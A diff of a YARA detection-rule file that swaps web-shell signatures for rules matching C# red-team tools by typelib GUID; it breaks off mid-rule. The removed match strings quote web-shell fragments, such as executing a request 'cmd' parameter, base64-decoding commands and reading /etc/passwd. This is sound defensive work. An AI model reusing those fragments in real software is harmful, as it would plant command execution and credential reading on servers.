+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2502-L2515"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "67627c264db1e54a4720bd6a64721674"
-		logic_hash = "d97df624801d0f24141dfe7074d290a56e639af7d867c907362ff4434c3eeac0"
-		score = 70
+		logic_hash = "ac81e20fa9e5a4f701172d3e68c016b33e5cbda6053505d46f761337fb374161"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
+		$typelibguid0lo = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Ani_Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsrpcclients : FILE
 {
 	meta:
-		description = "Web Shell - file Ani-Shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1205-L1220"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "70fd7431-8c32-52a4-be9f-2a19ef77f2cc"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/tyranid/WindowsRpcClients"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2517-L2536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "889bfc9fbb8ee7832044fc575324d01a"
-		logic_hash = "c8caf8686c36a41b5aae093e88b8872350cf625c59a14389c5df93f284c8f05a"
-		score = 70
+		logic_hash = "2e99c98514bde102450b119cda3cc3c20d7680de5ccbbf64124b719fb8333e8d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$Python_CODE = \"I"
-		$s6 = "$passwordPrompt = \"\\n================================================="
-		$s7 = "fputs ($sockfd ,\"\\n==============================================="
+		$typelibguid0lo = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii wide
+		$typelibguid1lo = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii wide
+		$typelibguid2lo = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii wide
+		$typelibguid3lo = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii wide
+		$typelibguid4lo = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii wide
+		$typelibguid5lo = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii wide
+		$typelibguid6lo = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_K8Cmd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpfruit : FILE
 {
 	meta:
-		description = "Web Shell - file k8cmd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1221-L1234"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bf318530-b17d-5275-84b2-c284528bdae6"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rvrsh3ll/SharpFruit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2538-L2551"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b39544415e692a567455ff033a97a682"
-		logic_hash = "e523a5b1118c6f4d5798f130c00466c7945d27a6fbe0d4cb3a40b7f36da2a502"
-		score = 70
+		logic_hash = "da59a7c8fb038171a560d337a49f33a28a2ea88e4c7b08df12eaeb85906c0753"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+		$typelibguid0lo = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Cmd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwitness : FILE
 {
 	meta:
-		description = "Web Shell - file cmd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1236-L1249"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5e707da6-b2dd-511e-89ad-d19b93e8fca6"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/SharpWitness"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2553-L2566"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5391c4a8af1ede757ba9d28865e75853"
-		logic_hash = "e48d4e2d14a3605fd9dda03630820a0fb53d893cc4d283739fde11f9ab7d9d1e"
-		score = 70
+		logic_hash = "9a9bc18362347f55b77ec275ad377da9e72ac8a65cab06a867ae55b61b69e7cd"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+		$typelibguid0lo = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_K81
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rexcrypter : FILE
 {
 	meta:
-		description = "Web Shell - file k81.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1251-L1265"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5ebbeab3-3e93-5544-8f74-3d1b47335d8b"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/syrex1013/RexCrypter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2568-L2581"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "41efc5c71b6885add9c1d516371bd6af"
-		logic_hash = "f9c6b5bec9313c6fd059055fa18332675838419bba3348bb852b50806f26ccb2"
-		score = 70
+		logic_hash = "fc8bd8eaa3561431bc8886de74b1d569d5fa1f2de7f866146669b4e918a3bf30"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
-		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+		$typelibguid0lo = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Zehir
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpersist : FILE
 {
 	meta:
-		description = "Web Shell - file zehir.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1266-L1279"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0c181186-7bb4-502b-8937-60cfd88ce689"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/fireeye/SharPersist"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2583-L2596"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0061d800aee63ccaf41d2d62ec15985d"
-		logic_hash = "90920258017cf189da128dce477e71f0040bc66aefa6f018f64db64d22f60ae5"
-		score = 70
+		logic_hash = "265f42a83973cacb82d4ff12db210ad6cb10265acc38724ed895dc772cf7855e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
+		$typelibguid0lo = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1253 : FILE
 {
 	meta:
-		description = "Web Shell - file Worse Linux Shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		old_rule_name = "webshell_Worse_Linux_Shell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1280-L1294"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3e18b533-1b85-5eaf-bb3d-aa5b90fd2e28"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/padovah4ck/CVE-2019-1253"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2598-L2611"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
-		logic_hash = "a24e7ae7c722da7f265f032315b1e8e402c2fc4a2a54a685671a9e52124f6553"
-		score = 70
+		logic_hash = "f365dcec83696032370192d95312999d3baa950379472b99af17687a501dfa9c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
+		$typelibguid0lo = "584964c1-f983-498d-8370-23e27fdd0399" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Zacosmall
+rule SIGNATURE_BASE_HKTL_NET_GUID_Scout : FILE
 {
 	meta:
-		description = "Web Shell - file zacosmall.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1295-L1308"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cd24cca7-3bc0-5e7a-9817-dc3b26ec8358"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/jaredhaight/scout"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2613-L2626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5295ee8dc2f5fd416be442548d68f7a6"
-		logic_hash = "739d58e3ab6712c703e0cb0e0070afec3376844b77ed081a5d12407cabb62319"
-		score = 70
+		logic_hash = "b677eb07dde231e1d6d542aaafcc0350ce51a66c5396949dd0f1d41311a822b5"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
+		$typelibguid0lo = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit
+rule SIGNATURE_BASE_HKTL_NET_GUID_Grouper2 : FILE
 {
 	meta:
-		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1309-L1322"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a9cd9a16-b2a5-5d15-af89-7a8d0f1835bb"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/l0ss/Grouper2/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2628-L2641"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
-		logic_hash = "9630fc0371193bfbd0bd4fb15856477e7739fc9f11ee539d119ee837b1a54502"
-		score = 70
+		logic_hash = "b89180f81c4231ea03bb49631b0931b2b7e4ff9e97f44798dd50f6fa4d12b75f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+		$typelibguid0lo = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Redirect
+rule SIGNATURE_BASE_HKTL_NET_GUID_Casperstager : FILE
 {
 	meta:
-		description = "Web Shell - file redirect.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1323-L1336"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0ad18d2b-b7cc-5316-a8e8-b05d4439b8e1"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/ustayready/CasperStager"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2643-L2657"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "97da83c6e3efbba98df270cc70beb8f8"
-		logic_hash = "b16026623fe7802db9823ad4a3dab051747eea6bd41ce72a0c8c6757bfa2c6f7"
-		score = 70
+		logic_hash = "556dd774b6ba38371951ca416133573b0539d699671200e3accfe5bc6fbc979d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
+		$typelibguid0lo = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii wide
+		$typelibguid1lo = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tellmeyoursecrets : FILE
 {
 	meta:
-		description = "Web Shell - file cmdjsp.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1337-L1350"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b00c353b-0446-5faa-87e5-0a7ba6ec2286"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xbadjuju/TellMeYourSecrets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2659-L2672"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b815611cc39f17f05a73444d699341d4"
-		logic_hash = "b4822e47a27c598be746ac71bf9b60dafe08d50c83a2dfee5e40ea384fcff21a"
-		score = 70
+		logic_hash = "b606c11986ff26d279db58c088633f39eddb41c96c2510f7738cfcef5ff4941f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+		$typelibguid0lo = "9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Java_Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexcel4_DCOM : FILE
 {
 	meta:
-		description = "Web Shell - file Java Shell.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1351-L1365"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "12d3f26b-40ca-5034-a7c2-9be9c8a7599b"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2674-L2687"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
-		logic_hash = "0d313ff81a36b456326df0054853c31d69710fc142fcfa65747691238af4e635"
-		score = 70
+		logic_hash = "278eeabdfa26eec5f9e6d2fba093b4698a9813813f644b65e4e28791b600a5dc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
-		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
+		$typelibguid0lo = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_1D
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshooter : FILE
 {
 	meta:
-		description = "Web Shell - file 1d.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1366-L1379"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a59e6fe9-dbaf-5830-8cf1-485ff4dd939a"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/mdsecactivebreach/SharpShooter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2689-L2702"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fad7504ca8a55d4453e552621f81563c"
-		logic_hash = "85b17fde8fb535b64e5eabc887428d9b73adc5bc6741a3a387f235a8b0c6089a"
-		score = 70
+		logic_hash = "79a63f9a24b94327b5b720c415143977c7fba088930dd94f6f2f2784770d182d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
+		$typelibguid0lo = "56598f1c-6d88-4994-a392-af337abe5777" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Ixrbe
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nomsbuild : FILE
 {
 	meta:
-		description = "Web Shell - file IXRbE.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1380-L1393"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9bc0661d-c60f-582b-8f88-87e3dfa13ddd"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rvrsh3ll/NoMSBuild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2704-L2718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
-		logic_hash = "8710d092b81c5de1e328ad6e57e5c4a25748cc92844198038c103dabc1e76e77"
-		score = 70
+		logic_hash = "df8bfecf2f983975a4885cbabc79d2b42c1281bdd918aa0fc9fa50ef75bbfe5d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+		$typelibguid0lo = "034a7b9f-18df-45da-b870-0e1cef500215" ascii wide
+		$typelibguid1lo = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_G5
+rule SIGNATURE_BASE_HKTL_NET_GUID_Teleshadow2 : FILE
 {
 	meta:
-		description = "Web Shell - file G5.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1394-L1407"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5b22f2c4-0bd1-5a5a-8867-8fbc773d2b44"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/ParsingTeam/TeleShadow2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2720-L2734"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "95b4a56140a650c74ed2ec36f08d757f"
-		logic_hash = "2edffbea5142ef146cec57cb88b473532f56ab3e95151c5648eaeabe6a75feda"
-		score = 70
+		logic_hash = "df4f26856b5ee348393ddb41e53bdfc8e2bed58ed9fc7b4f758cd1746431d85c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
+		$typelibguid0lo = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii wide
+		$typelibguid1lo = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_R57142
+rule SIGNATURE_BASE_HKTL_NET_GUID_Badpotato : FILE
 {
 	meta:
-		description = "Web Shell - file r57142.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1408-L1421"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8bee12fc-fc29-5256-b559-d914ef202c0c"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/BeichenDream/BadPotato"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2736-L2749"
